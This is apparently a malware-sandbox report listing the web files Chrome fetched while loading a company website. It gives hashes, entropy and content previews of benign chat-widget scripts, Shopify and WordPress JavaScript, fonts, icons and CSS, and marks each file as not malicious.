                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:R69xntdnuB9Rvx8yx2KFQuBmxyL77+gEB/P2EEOfJyLD1MoR4:R69xtdKLDPQ6/GBPFEOfCML
                                                                                                                                                                                              MD5:019CB5DE92BC44487414CF2DF570EB1F
                                                                                                                                                                                              SHA1:648EBF82BD015BC530F5BE00DB24589EF325C466
                                                                                                                                                                                              SHA-256:CAA53054DC12F4194410B03956C943038CFC7963C54B95C2FCAB47F2AECB6111
                                                                                                                                                                                              SHA-512:2202AE0C32E1BEB049AE012870591BE949E16ECD7EFE705E7E1E72FCF9047ADECADE83B2E1476B82E92C0D3C8EDA8DCF3FC7ADB822F2EC0E0245FADB2B965D70
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient-bucket5/storage.js?v=1732053196593
                                                                                                                                                                                              Preview:!function e(t,n,r){function o(a,s){if(!n[a]){if(!t[a]){var u="function"==typeof require&&require;if(!s&&u)return u(a,!0);if(i)return i(a,!0);var c=new Error("Cannot find module '"+a+"'");throw c.code="MODULE_NOT_FOUND",c}var f=n[a]={exports:{}};t[a][0].call(f.exports,function(e){var n=t[a][1][e];return o(n?n:e)},f,f.exports,e,t,n,r)}return n[a].exports}for(var i="function"==typeof require&&require,a=0;a<r.length;a++)o(r[a]);return o}({1:[function(e,t,n){!function(e,n){"undefined"!=typeof t&&t.exports?t.exports.browser=n():"function"==typeof define&&define.amd?define(n):this.bowser=n()}(0,function(){function e(e){function n(t){var n=e.match(t);return n&&n.length>1&&n[1]||""}var r,o,i,a=n(/(ipod|iphone|ipad)/i).toLowerCase(),s=!/like android/i.test(e)&&/android/i.test(e),u=n(/edge\/(\d+(\.\d+)?)/i),c=n(/version\/(\d+(\.\d+)?)/i),f=/tablet/i.test(e),l=!f&&/[^-]mobi/i.test(e);/opera|opr/i.test(e)?r={name:"Opera",opera:t,version:c||n(/(?:opera|opr)[\s\/](\d+(\.\d+)?)/i)}:/windows phone/i.te
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4794), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4794
                                                                                                                                                                                              Entropy (8bit):5.803306061530661
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:1gv6vV0qSkxO9D06lUUTz9NnSzZhFt8vf1dtzlTadRWU38ba:1dCqSF9Q6RX9hq0z0RR38ba
                                                                                                                                                                                              MD5:D2FDA1DC43148B161C68ACDD74B2C902
                                                                                                                                                                                              SHA1:068A19747CFF03FF2271E701E339A23ED26DD04E
                                                                                                                                                                                              SHA-256:292FBD578AA18A1F56D5F14F1CE5DF356BDD2EF359980E96FC8E502D03C61146
                                                                                                                                                                                              SHA-512:80F0236AD26252757E6947BC3836205EE669CA6EDD95062E4BD4C19C593F732387AABDC0AAC22276681CD0F0CFAA00C07EBBCA827D4CC1A7B5C607E732CF66F9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (32038)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):374607
                                                                                                                                                                                              Entropy (8bit):5.2222712812169165
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:WurVPdGVPgGVPnuVPgJVPLGVPmGVP5GVPkGVP1GVP8GVPcGVPJGVPu4pqYe4yBic:v4pqYlI4wbfsMCY
                                                                                                                                                                                              MD5:6A1FB3D4699F3E56DE5E95A439D21657
                                                                                                                                                                                              SHA1:7CF8A55FC6F573C4726554D0BBF3546220B0C4B1
                                                                                                                                                                                              SHA-256:BF41F73936EEFAED7C45ED6DF28B056C2E1F7B44B0FFE63D56D07D081CF7F428
                                                                                                                                                                                              SHA-512:67DBDAC518F0A047E7DF19619E11D6564631283AAFC62FC26F044B207E6DD6829B982FE8355F934F0100814B842657CC253A088272E81E34F2C23F258955B045
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://sdks.shopifycdn.com/buy-button/latest/buy-button-storefront.min.js
                                                                                                                                                                                              Preview:/* Shopify buy-button-storefront @3.1.8 */.var ShopifyBuy=function(){"use strict";function t(t,e){return e={exports:{}},t(e,e.exports),e.exports}function e(){Function.prototype.bind.toString().match("native code")||(Function.prototype.bind=z)}function n(t){var e=t.options,n=e&&e.cart&&e.cart.styles,a=e&&e.product&&e.product.styles,i=e&&e.modalProduct&&e.modalProduct.styles,o=n&&e.cart.styles.subtotal;o&&!e.cart.styles.discountAmount&&(t.options.cart.styles.discountAmount=o);var r=n&&e.cart.styles.subtotalText;r&&!e.cart.styles.discountText&&(t.options.cart.styles.discountText=r);var d=a&&e.product.styles.compareAt;d&&!e.product.styles.unitPrice&&(t.options.product.styles.unitPrice=d);var c=i&&e.modalProduct.styles.compareAt;return c&&!e.modalProduct.styles.unitPrice&&(t.options.modalProduct.styles.unitPrice=c),t}function a(){return R}function i(){return Q}function o(t,e,n,a){var i={maxage:n?H:G,domain:a,path:"/"};$.write(t,e,i)}function r(){return $.enabled()}function d(t){return $.rea
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 22804, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):22804
                                                                                                                                                                                              Entropy (8bit):7.991177280397459
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:384:5oPIJUDKIA8CDV43Tnon9JFcunvvppP1PR8SjWtzSqU23xLp2QS9ANJJRuGBE:eW005GTnGCw5lvW5xU2BLAhybRuX
                                                                                                                                                                                              MD5:90B4E60F87BEFFE9EAD6A5A60E1B91D5
                                                                                                                                                                                              SHA1:3B74DB0420DE81ECAF95CA80AE6AB53A71875F85
                                                                                                                                                                                              SHA-256:DEF10BC23A3E7B06586D1AC6451DEA370C1011622CC0D0A000F88A2F61158078
                                                                                                                                                                                              SHA-512:106B613597D4600F2B91C01BEF15BECDE5EE2FE988D4ED12B99D41635C83FAF29513A15B0F252430F5AE28FE906A418219162DE9868EDF4403784CAABACFDE72
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/comfortaa/v45/1PtCg8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMXL830efAesmwYSFoxBEP_I0.woff2
                                                                                                                                                                                              Preview:wOF2......Y........,..X...........................O..:...?HVAR./.`?STATX'..../L.....x.....|.0..\.6.$..r. ..@..&...z.5xn\t.Y....!9#...Y.3f...6..&,0..O9*.....g....L.k...U5*8<<..5..tUFUd...>..u...)h.Cq.^.A.....I..O.Gh..|.."...B...._.......Du..)..T/.....n..L.2..!.j...........8.G.].'.|3..Od..]RJ....T...?....o.-..#.F.(:GH...M..Y....0......[TM.@...%...k..ER....XK.].mI...YC....l..$.I.)....B.(x...H.AUN.-5.........3+'.|.F.N2......~G......;...<..........I..<..D|..Q..")..C).hbgs.&...po.{c...iw.}u}.s.+.mY.d.....j.}.7Wu....@.CmZ..Sd..ub..z.v../.....@.+jK.C]./.p...i..+......A..+..6.m.hu...|..-."L"..QY\..Fh...f..)%i.^...X...t.C...,..?.q..T<..7.......ry.....@...|..k..'......l~A.CK......J..z..*....f..o......!.%=...)......HsoIaI.b._.B..<!.j...K5....& Ke.c.6....M..6C.N).R......3.h.....( h...R..5E..1@);..$.(:.Z.!....{8.i.|....a.o.t...E.1.......s.8..H.".L..Cb.v..Z...8|./....7.b.PD...:..}.~.Y.;)7..!. .F.._.....P.Upc.l..)=.../{..w..mb6.F.Q.G@....W;..@H/[`.V...[.}.p4."H
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 46 x 46, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):765
                                                                                                                                                                                              Entropy (8bit):7.494282250499431
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:6v/74vVJpAQUHoUvB9DExHSkCehH3SK57nhhCNxstxd3+1yR+smbic9:XjppUnSSTECczhastxdO1yR8+O
                                                                                                                                                                                              MD5:6D34548BEC274EA1F743977710FA0FB5
                                                                                                                                                                                              SHA1:EB550BD0AA0208FCF0D3BE7728FB10066F04AAF7
                                                                                                                                                                                              SHA-256:BAF8FFC97ED93736C6EA295F3082C49A0217A58FB09D3B0E469210E7340B5C67
                                                                                                                                                                                              SHA-512:0E2753966A1D999A9C40393361ACE504ACC3CB5DA9DCED34C57C1B51D789D552C30F6B0A425CF60D4916D48876B6629E250B41939809A62078B67E8151A92D20
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.PNG........IHDR....................iCCPicc..x.c``2ptqre.``..+).rwR...R`?..............> v^~^*...v...D_....@..J.(*.....(%.8......../)(....."I.`....($...>.d.C.W@.$....].......>..f....a..%.. {....*.2.3J..---..S.R..+.KRs..<.....KRS.j...A.BP.i.5Zh2P........._F.3.1.H.-*.2......f.``._.....!f....@....*BL..A@..a.....O...".... cHRM..z%..............R....X..:....o.Z.....sIDATx..KN.@......G..Rh...p.X.k..+iEyI...f.%....FVF%...f...Y3..&<g.p..5.H.q@..b..L+!.4[c6.-SZ.Q'5..q:s.m....ZfN........Sg.`..m!.GUbg...C....l....j...#.1....b.....Qa.....V.5R.v)I..3..8..{T..g.....A......3..M.t..D{ .....O.o!m..X|q.....=i3y... "..k.)Rz.R.Q..X._.m(F..w...Iy+.o..z.b...G.=y..'WY,..b.../..P.Z.o..s....-t..2.&~..-}...z...3.0*.._...v...96.$......0....z......IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 70 x 69, 8-bit colormap, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):609
                                                                                                                                                                                              Entropy (8bit):7.506422050947946
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:6v/7ncMEejXzed4aVp4bBmGSUY3VDLMSMlakAHt3+Ypdx5EEePKSZ9:vMled4aCQGUMSMmN3+Yp5sf
                                                                                                                                                                                              MD5:607D397302B1F344F8D8DF1258004046
                                                                                                                                                                                              SHA1:BE2F65980DF878CD5448C3069F29165FF839C211
                                                                                                                                                                                              SHA-256:0015FEA1D81D92A7C847E78F4DC6B997A8FE53DC8CE575662AEA71FFB28E1E4C
                                                                                                                                                                                              SHA-512:1749DD3E452D969F70A2005AFC3BFA9C05ACA7AF1E84E9F752F2083A2B630FA67B943A86BDF6EA8A18DA6A90284AA3B50C8A0EF20FA5A73829DEC19A6A4588F3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/images/warning-info.607d397302b1f344f8d8df1258004046.png
                                                                                                                                                                                              Preview:.PNG........IHDR...F...E......d`....0PLTEGpL.U8.\F.\F.\E.]E.]E._?.\E.\E....]C.[C.??.[G.\DPV......tRNS..$P....c..1@....d<.....IDATx... ..s+....v..B.!.q6~...}()8...Ri3.f....1Y7^..........C..i3.A. Z.i..4.$....l.Ed.f...%m.N..p......CH.....{...e.\Z.E.]....7.X.()..|.O...+{........G.....I}'r.{../x.|..v.5.H"...,.3....b.P...........3........c....#F..'....M....s..&LZ..".M...U...Z.<U..j........I^/...c .. f~.#z.Y1.Mr~.3..Ia0.7..y.Y.`..p.b ...z.?._o|.:..z.t...n.....^.[\...!nu..3.~Cz^.z/d9...2.k..N..N0{8..x./...._.@..........7U....^Uz...W........5.v...|..p....<.(.Q...'&..o~.>.....n..d....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (32038)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):374607
                                                                                                                                                                                              Entropy (8bit):5.2222712812169165
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:WurVPdGVPgGVPnuVPgJVPLGVPmGVP5GVPkGVP1GVP8GVPcGVPJGVPu4pqYe4yBic:v4pqYlI4wbfsMCY
                                                                                                                                                                                              MD5:6A1FB3D4699F3E56DE5E95A439D21657
                                                                                                                                                                                              SHA1:7CF8A55FC6F573C4726554D0BBF3546220B0C4B1
                                                                                                                                                                                              SHA-256:BF41F73936EEFAED7C45ED6DF28B056C2E1F7B44B0FFE63D56D07D081CF7F428
                                                                                                                                                                                              SHA-512:67DBDAC518F0A047E7DF19619E11D6564631283AAFC62FC26F044B207E6DD6829B982FE8355F934F0100814B842657CC253A088272E81E34F2C23F258955B045
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:/* Shopify buy-button-storefront @3.1.8 */.var ShopifyBuy=function(){"use strict";function t(t,e){return e={exports:{}},t(e,e.exports),e.exports}function e(){Function.prototype.bind.toString().match("native code")||(Function.prototype.bind=z)}function n(t){var e=t.options,n=e&&e.cart&&e.cart.styles,a=e&&e.product&&e.product.styles,i=e&&e.modalProduct&&e.modalProduct.styles,o=n&&e.cart.styles.subtotal;o&&!e.cart.styles.discountAmount&&(t.options.cart.styles.discountAmount=o);var r=n&&e.cart.styles.subtotalText;r&&!e.cart.styles.discountText&&(t.options.cart.styles.discountText=r);var d=a&&e.product.styles.compareAt;d&&!e.product.styles.unitPrice&&(t.options.product.styles.unitPrice=d);var c=i&&e.modalProduct.styles.compareAt;return c&&!e.modalProduct.styles.unitPrice&&(t.options.modalProduct.styles.unitPrice=c),t}function a(){return R}function i(){return Q}function o(t,e,n,a){var i={maxage:n?H:G,domain:a,path:"/"};$.write(t,e,i)}function r(){return $.enabled()}function d(t){return $.rea
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):757
                                                                                                                                                                                              Entropy (8bit):5.141689585305651
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:UCX7HAXNph7hHijN8IUH/uQc7Ib18mRo+4y12EwdwKgA65txItSQMa7QyX7GogzC:DX6SOuQNy+4LERKgA+txoS2yo+RRJ3/w
                                                                                                                                                                                              MD5:076EB80E7A702E9AD12B30B37FBD9CDB
                                                                                                                                                                                              SHA1:E4BD92E64BC5DDFDF4FAD2D4999FE6B1D3025D5C
                                                                                                                                                                                              SHA-256:E1F45DE9EC0F496FCA04EC97CCA918F0BFECF1C51052F6A92BE93B2F2C9F5628
                                                                                                                                                                                              SHA-512:F79D201F37E853D961D3D3820EC189628A4E3CDAC21DAA560929E1FEB800339DE5D19F6F337BA55F666F76BBB678523CD465989E1B25F4A7779A0579D4A09474
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:/**/try{hbl.client.callbacks.pollevents(.{. "capacity": false,. "conversation_has_slot": false,. "conversation_id": "tM65kxeIWm5Vcm4e542fr0UBjA8B6bor",. "in_active_conversation": false,. "ipaddress": "8.46.123.75",. "is_popup": false,. "last_index": 0.0,. "machine": "nrpc-http-5d9875854f-lpm6v",. "new_events": [],. "operator_composing_state": "active",. "operator_has_sent_message": false,. "operator_nickname": null,. "resend_nickname": false,. "resend_status": false,. "site_is_online": false,. "status_state": "offline",. "visitor_id": "QnUrnKaYLl744rSP542fr0UBrj6a8ok0".}.);}catch(e){}try{if(document.getElementById('olark-21732134555374')) hbl.util.remove_element('olark-21732134555374');}catch(e){}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):27398
                                                                                                                                                                                              Entropy (8bit):4.91662763844468
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:DMS0/sMQzkp0giSDMzTQQowDIhKJZEPdTt3TbvwdFN6RRHB5c:DMZ1QowDIhKJZEPdTt3YdFN6RRHB5c
                                                                                                                                                                                              MD5:A0A3D7395E807B9004F16FBD9CC5FF1D
                                                                                                                                                                                              SHA1:E75EB5F6B597CCF985D79DDE2996BD6507F7D04F
                                                                                                                                                                                              SHA-256:32FCA2365290CFA325288B77B0AFFBEF9833AEF25D478F2A2F2310EFAD636C6F
                                                                                                                                                                                              SHA-512:0D36D9BAD1AEEF408BEB7A5943C1D597DF88436076C1E4BE99BF7152F1F53125B0A6619605642EE2EBFBEE10FC757DFAF464D45250B0B37784563E71AE42B6B2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/css/hamburgers.css
                                                                                                                                                                                              Preview:/*!. * Hamburgers. * @description Tasty CSS-animated hamburgers. * @author Jonathan Suh @jonsuh. * @site https://jonsuh.com/hamburgers. * @link https://github.com/jonsuh/hamburgers. */..hamburger {. padding: 15px 15px;. display: inline-block;. cursor: pointer;. transition-property: opacity, filter;. transition-duration: 0.15s;. transition-timing-function: linear;. font: inherit;. color: inherit;. text-transform: none;. background-color: transparent;. border: 0;. margin: 0;. overflow: visible; }. .hamburger:hover {. opacity: 0.7; }. .hamburger.is-active:hover {. opacity: 0.7; }. .hamburger.is-active .hamburger-inner,. .hamburger.is-active .hamburger-inner::before,. .hamburger.is-active .hamburger-inner::after {. background-color: #fff; }...hamburger-box {. width: 40px;. height: 24px;. display: inline-block;. position: relative; }...hamburger-inner {. display: block;. top: 50%;. margin-top: -2px; }. .hamburger-inner, .hamburger-inner::before, .hamburger
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (51505)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):172496
                                                                                                                                                                                              Entropy (8bit):4.836219693714793
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:7ZSYN11NmS/rH5kTpvjF4OB96t++7a/C7gm/X2mLkETNIaBlQuNlGrSqTaIc0ZH0:1vflkTpGA0/X2GVNlGh0
                                                                                                                                                                                              MD5:47F5299EDF8FF7C298FB2247303D2BB1
                                                                                                                                                                                              SHA1:634F3AB226C0DD37008CE3F2261C1ACC95B2B65E
                                                                                                                                                                                              SHA-256:AADCB18BEAD55CA54D3D23F11827742C66A38BF1AD2ADF45DC7D6B5AA0516726
                                                                                                                                                                                              SHA-512:525F07E1C01A186A0F0120BDA96B63745C5CA70D6BB96212FC5C4037A7556EB2ECF2205A60764832091677F565849186B15E5136EF3D086001BB2C75E63BBFE0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient/styles/cryptic-capybara/theme.css
                                                                                                                                                                                              Preview:#olark-container,#olark-container h1,#olark-container h2,#olark-container h3,#olark-container h4,#olark-container h5,#olark-container h6,#olark-container p,#olark-container td,#olark-container dl,#olark-container tr,#olark-container dt,#olark-container ol,#olark-container form,#olark-container select,#olark-container option,#olark-container pre,#olark-container div,#olark-container table,#olark-container th,#olark-container tbody,#olark-container tfoot,#olark-container caption,#olark-container thead,#olark-container ul,#olark-container li,#olark-container address,#olark-container blockquote,#olark-container dd,#olark-container fieldset,#olark-container iframe,#olark-container strong,#olark-container legend,#olark-container em,#olark-container summary,#olark-container cite,#olark-container span,#olark-container input,#olark-container sup,#olark-container label,#olark-container dfn,#olark-container object,#olark-container big,#olark-container q,#olark-container samp,#olark-container acro
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                              Entropy (8bit):4.828388437846051
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:T1GgJcBG8dLXehwaWIAIhIL+NV5TV7KWT+EqHxdFbEyZEAFb9pgrYMwBuU4X:TEgJc9LLNIAIOiV5TV7KWT+px7RP9pgN
                                                                                                                                                                                              MD5:C8322BD5BFFC8E2856F2CBCD03C61D18
                                                                                                                                                                                              SHA1:A2FA945F9AC01FA3191A950C3F2CCE188F50C4EF
                                                                                                                                                                                              SHA-256:AAF08BE6AE4ED211293A6D4280E2D052E1F332EB0066A0DC0192FD8A3A9F39D2
                                                                                                                                                                                              SHA-512:51334FE415CB229B6C6A3E5674A16B905A2FF78943C7E781BDB2B2A1ED5801F8DE44F0BE813E64C99D7490E1C27CD66A12E8B5B319AABE874D531DCA6EE608FC
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/css/owl.carousel.css
                                                                                                                                                                                              Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */./*. * Owl Carousel - Core. */..owl-carousel {. display: none;. width: 100%;. -webkit-tap-highlight-color: transparent;. /* position relative and z-index fix webkit rendering fonts issue */. position: relative;. z-index: 1; }. .owl-carousel .owl-stage {. position: relative;. -ms-touch-action: pan-Y;. touch-action: manipulation;. -moz-backface-visibility: hidden;. /* fix firefox animation glitch */ }. .owl-carousel .owl-stage:after {. content: ".";. display: block;. clear: both;. visibility: hidden;. line-height: 0;. height: 0; }. .owl-carousel .owl-stage-outer {. position: relative;. overflow: hidden;. /* fix for flashing background */. -webkit-transform: translate3d(0px, 0px, 0px); }. .owl-carousel .owl-wrapper,. .owl-carousel .owl-item {. -webkit-backface-visibi
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (32002)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):57075
                                                                                                                                                                                              Entropy (8bit):5.359090811397082
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:EFu+Xw7Bfv61xzU/VlbD3X1C/R7x25EiC7Csp49il3Oe/pkpVq+005U:Mcq1YZjXQ1x25CpsAY1Xy
                                                                                                                                                                                              MD5:BAAD5123CADC45E68F08614054AB3700
                                                                                                                                                                                              SHA1:7FC12758C0FED5A9EA2697427961A50FABD82AB4
                                                                                                                                                                                              SHA-256:3A0109833B570C1981CD6465E8715CE4510C098FD4E687EB12894CC0FFD480A4
                                                                                                                                                                                              SHA-512:3BE54348E1E929DFCCAF23DC2FAA93BD56C300B03D4FC9CE40C87796309D78ED535F72AECEDCEF70BBA8EB1F861A773B240D41FE7ABFCC4D2D1D7603715C510C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient/app.js
                                                                                                                                                                                              Preview:!function e(t,o,n){function r(s,a){if(!o[s]){if(!t[s]){var l="function"==typeof require&&require;if(!a&&l)return l(s,!0);if(i)return i(s,!0);var c=new Error("Cannot find module '"+s+"'");throw c.code="MODULE_NOT_FOUND",c}var u=o[s]={exports:{}};t[s][0].call(u.exports,function(e){var o=t[s][1][e];return r(o?o:e)},u,u.exports,e,t,o,n)}return o[s].exports}for(var i="function"==typeof require&&require,s=0;s<n.length;s++)r(n[s]);return r}({1:[function(e,t,o){!function(e,o){"undefined"!=typeof t&&t.exports?t.exports.browser=o():"function"==typeof define&&define.amd?define(o):this.bowser=o()}(0,function(){function e(e){function o(t){var o=e.match(t);return o&&o.length>1&&o[1]||""}var n,r,i,s=o(/(ipod|iphone|ipad)/i).toLowerCase(),a=!/like android/i.test(e)&&/android/i.test(e),l=o(/edge\/(\d+(\.\d+)?)/i),c=o(/version\/(\d+(\.\d+)?)/i),u=/tablet/i.test(e),h=!u&&/[^-]mobi/i.test(e);/opera|opr/i.test(e)?n={name:"Opera",opera:t,version:c||o(/(?:opera|opr)[\s\/](\d+(\.\d+)?)/i)}:/windows phone/i.te
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):769
                                                                                                                                                                                              Entropy (8bit):4.935048523024334
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:YdOH0L5CukyaNruj4zAEQtpyhYSgAMtxGf4:YdPL5CTyaZc4UEEyhYS0txf
                                                                                                                                                                                              MD5:7E6BB142533F5EA15ED2BFB5A7F19B53
                                                                                                                                                                                              SHA1:A4B126B1AA455044ECB53AC7D3BF41EA339380F6
                                                                                                                                                                                              SHA-256:6A2FCEF836C4076A0FE57B344AABB004758B5A324F29A348C7129FB430472AEA
                                                                                                                                                                                              SHA-512:61E3445530EFC13AA7E20E07D7AD9560F3374D4F5462CD095CDB51AEC30161F9FE444ACF399E72BD9863B00906B4D96E526E86F58D314AF2791284DE4BCEE00A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:{"conversation_history": [], "capacity": false, "site_is_online": false, "status_state": "offline", "conversation_has_slot": false, "has_free_chats": true, "site_config_changed": false, "assets_config_md5": "c87dc7f0f6c6c4f9a50761cab5b8da86", "ipaddress": "8.46.123.75", "geolocation_data": {"country": "United States", "ipaddress": "8.46.123.75", "country_code": "US"}, "operator_composing_state": "active", "operator_nickname": null, "in_active_conversation": false, "operator_has_sent_message": false, "ssl": true, "is_premium": true, "is_popup": false, "visitor_id": "QnUrnKaYLl744rSP542fr0UBrj6a8ok0", "dormant": true, "conversation_id": "tM65kxeIWm5Vcm4e542fr0UBjA8B6bor", "resend_nickname": false, "resend_status": false, "machine": "nrpc-http-5d9875854f-vbt6p"}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):26106
                                                                                                                                                                                              Entropy (8bit):5.279792248578483
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:HyiUGUQ/cEN/MpqDMCC/MD6cn3L0Jpl8uClD2tFtJ7byTwtawuf8OQL0sAZAGNWw:HyiUGUa996k3LkgoCWL0si4eLe02Vauu
                                                                                                                                                                                              MD5:33FDB0B4D490C8D40F45F930AD2E6E13
                                                                                                                                                                                              SHA1:39042205A70AC91884971DF621BE5D6AFE83338C
                                                                                                                                                                                              SHA-256:BAB9A1AE86EF77B04E7782148870F0C528A692BDAD407D044505B99BA43C3071
                                                                                                                                                                                              SHA-512:A58077C5C1F61EEEC9B415F9051DCAE0CBAE2DD3BF6531B4FEC378DD716FF023314D0F2236A2CF0CC4A0906D50260835C4D64070F54ACF3F7DEAA07435E31F38
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:./*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>S,addAction:()=>m,addFilter:()=>p,applyFilters:()=>k,createHooks:()=>h,currentAction:()=>w,currentFilter:()=>I,defaultHooks:()=>f,didAction:()=>O,didFilter:()=>j,doAction:()=>b,doingAction:()=>x,doingFilter:()=>T,filters:()=>z,hasAction:()=>v,hasFilter:()=>y,removeAction:()=>A,removeAllActions:()=>F,removeAllFilters:()=>g,removeFilter:()=>_});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, under
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
